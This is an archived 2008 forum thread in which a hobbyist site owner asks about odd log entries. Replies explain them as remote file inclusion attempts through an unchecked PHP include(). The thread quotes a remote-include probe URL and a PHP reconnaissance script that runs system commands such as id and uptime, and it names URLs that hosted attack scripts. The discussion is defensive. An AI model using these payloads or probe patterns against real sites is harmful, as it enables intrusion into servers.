PDA

View Full Version : Is someone trying to hack my web site?


SomePerson
13 Jul 2008, 09:01
I've been getting a lot of hits recently on my web site to pages which don't exist like ht*p://brian.kentosh.com/index.php?pg=ht*p://210.115.243.30/x.txt?? (my asterisks) and I don't really get what's up or what they're trying to accomplish... I don't know if people are trying to hack the page or what. 'pg' is just a variable I use in a switch case to determine what content to display - I don't see how anyone could think to accomplish anything by putting web addresses in there.

They occur with distinct ip addresses, not as an ip address that viewed any other pages. They usually come in pairs, with two different web addresses per ip, although there were a couple with only one. "Agent" field where it tells me browser information says a few times 'DataCha0s/2.0' but usually 'libwww-perl/5.805' I looked up the Data chaos one and found several references that it's a hacker bot located in Brazil or something. There's mention of the same kind of deal I have with libwww-perl/5.xxx at http://www.ivorde.ro/libwwwperl5805_User_agent_bot_visited_my_website-28.html

I don't really know what to make of it - it seems entirely random. Again, pg is only used as the argument of a switch case, so I have nothing to worry about, right? And if it is a hacking script/bot/thing, why on earth would it target my site which has no user accounts, no credit cards or anything of the sort... :-/

SupSuper
13 Jul 2008, 14:10
They're trying to hack your website, or more to the point, exploit a common security hole. They saw the way your page is designed and immediately tried the most common trick. Just because your page isn't serious business doesn't mean it's not exploitable.

When you make a website you usually have common elements that go on every page, like menus and logos. But of course you don't want to copy+paste it over every page, that's silly, so the first thought is to set up a index.php with all the common elements that loads within whatever xxx page you want to display, passed as index.php?page=xxx. Problem solved!

But most people are lazy and just do a include(xxx) without any checking, which instantly lets anyone pass whatever script they want into the site and cause havoc, which is what they're trying to do in your case. Luckily you've got that secured, but you might wanna look for any other security holes now that you got some hacker's attention. :p

M3ntal
13 Jul 2008, 14:55
You're fine, i just tested that method and your site isn't vulnerable to it (you'll see an attempt in your logs to load up google within your page, that's me). You can quite safely read through the script they were trying to run on your page here: http://210.115.243.30/x.txt

I'll try a few more variations and let you know if i find anything, anything in your logs from 87.194.xxx.xx will be me.

Edit: Nope, seems fine.

SupSuper
13 Jul 2008, 17:00
You're fine, i just tested that method and your site isn't vulnerable to it (you'll see an attempt in your logs to load up google within your page, that's me). You can quite safely read through the script they were trying to run on your page here: http://210.115.243.30/x.txtFun link. :p
http://img134.imageshack.us/img134/5554/holyvirushw8.png

SomePerson
13 Jul 2008, 21:39
You're fine, i just tested that method and your site isn't vulnerable to it (you'll see an attempt in your logs to load up google within your page, that's me). You can quite safely read through the script they were trying to run on your page here: http://210.115.243.30/x.txt

I'll try a few more variations and let you know if i find anything, anything in your logs from 87.194.xxx.xx will be me.

Edit: Nope, seems fine.

Wow, that link looks like a load of gibberish to me. O.o I'm glad it didn't seem to do its job... I've also receiver numerous attempts to run scripts like this:


<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}

return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "netcat<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "netcat<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;


This is one I think I can understand - it seems they're trying to obtain and display information about my server? Even if they got this information, what could they do with it?

They're trying to hack your website, or more to the point, exploit a common security hole. They saw the way your page is designed and immediately tried the most common trick. Just because your page isn't serious business doesn't mean it's not exploitable.

When you make a website you usually have common elements that go on every page, like menus and logos. But of course you don't want to copy+paste it over every page, that's silly, so the first thought is to set up a index.php with all the common elements that loads within whatever xxx page you want to display, passed as index.php?page=xxx. Problem solved!

But most people are lazy and just do a include(xxx) without any checking, which instantly lets anyone pass whatever script they want into the site and cause havoc, which is what they're trying to do in your case. Luckily you've got that secured, but you might wanna look for any other security holes now that you got some hacker's attention. :p

Oh, that makes sense sorta. I never knew about the include(xxx) function so I just set up my page with the one thing I knew how to do in php... :o


<?php
switch ($_GET['pg']) {

case null:
$media = 'N/A';
$title = 'Home';
$content = '<p>Welcome to the semi-updated page of Brian Kentosh's projects. The site is, and has been, undergoing renovations for quite some time. Please check back every now and then for updates.</p>';
break;

case 'news':
$media = 'N/A';
$title = 'News';
$content = '<p>Jun. 24, 2008 - I finally moved the work-in-progress page to the main page, even though it's not done yet, and I still intend to put plans and progress shots up for all my creations, so be sure to check back occasionally, although I admit it may be a while. I also need to rewrite a lot of the descriptions because I was younger when I wrote most of them, and looking back on them they're a bit embarrassing. I'm hoping to have all this done by the end of summer. Progress shots are now available for the Electric Balalaika as that seems to be by far the most popular of my creations.</p>';
break;

etc. (the switch case goes on) I assume they can't really use that to run their scripts... Other than that the only other php code is a few echo commands.


Actually, looking back through my logs I see more of the script I posted above, but then one instance of another evil one at http://www.geocities.com/sofiawila/test.txt The only thing I get out of it are the words Windows and Safe Mode; I'm not sure if they're trying to mess with the server or something but the server is running Linux for all its worth.

AndrewTaylor
13 Jul 2008, 22:38
I've had people do this to me, too.

M3ntal
14 Jul 2008, 16:00
Fun link. :pLol, it's harmless as a .txt file, your antivirus correctly picked it up as a PHP exploit, so don't install a web server with PHP on your PC, rename that .txt to a .php, and run it.
Oh, that makes sense sorta. I never knew about the include(xxx) function so I just set up my page with the one thing I knew how to do in php... :o


<?php
switch ($_GET['pg']) {

case null:
$media = 'N/A';
$title = 'Home';
$content = '<p>Welcome to the semi-updated page of Brian Kentosh's projects. The site is, and has been, undergoing renovations for quite some time. Please check back every now and then for updates.</p>';
break;

case 'news':
$media = 'N/A';
$title = 'News';
$content = '<p>Jun. 24, 2008 - I finally moved the work-in-progress page to the main page, even though it's not done yet, and I still intend to put plans and progress shots up for all my creations, so be sure to check back occasionally, although I admit it may be a while. I also need to rewrite a lot of the descriptions because I was younger when I wrote most of them, and looking back on them they're a bit embarrassing. I'm hoping to have all this done by the end of summer. Progress shots are now available for the Electric Balalaika as that seems to be by far the most popular of my creations.</p>';
break;

etc. (the switch case goes on) I assume they can't really use that to run their scripts... Other than that the only other php code is a few echo commands.
Your code is fine.

Slick
14 Jul 2008, 21:48
Crap, He's On To Me!



...WHY DID I POST THIS?!